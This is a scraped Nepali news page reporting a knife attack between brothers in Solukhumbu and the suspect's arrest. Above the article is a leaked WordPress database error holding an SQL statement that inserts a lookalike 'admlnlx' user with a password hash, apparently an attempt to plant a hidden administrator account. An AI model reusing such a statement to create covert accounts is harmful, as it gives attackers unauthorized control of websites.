WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIhp9UOXO.GIxCkdZUk29l1tvRv5gA0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 13:27:37', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, सोलुखुम्बु । सोलुखुम्बुको नेचासल्यान गाउँपालिकामा भाइको छुरा प्रहारबाट दाइ घाइते भएका छन् । नेचासल्यान गाउँपालिका ४ का श्याम राइको छुरा प्रहार बाट उनका दाजु मोविन राई घाइते भएको हो ।
घरमा दाजु भाइको सामान्य विवाद हुदा छुरा प्रहार भएको प्रहरीले जनाएको छ । उफरमा ठूलो आवाजमा गित नबजाउन आग्रह गर्दा भाइले दाइलाई छुरा प्रहार गरेको बताईएको छ ।
छुरा प्रहारबाट मोविनको देव्रे कोखामा चोट लागेको र उनलाई १७ वटा टाँका लागाइएको छ । बुधबार राति भएको घटना पछि फरार रहेका श्यामलाई प्रहरीले बिहिबार दिउसो पक्राउ गरी इलाका प्रहरी कार्यालय नेचाले कार्वाही प्रक्रिया अगाडी बढाएको जनाएको छ ।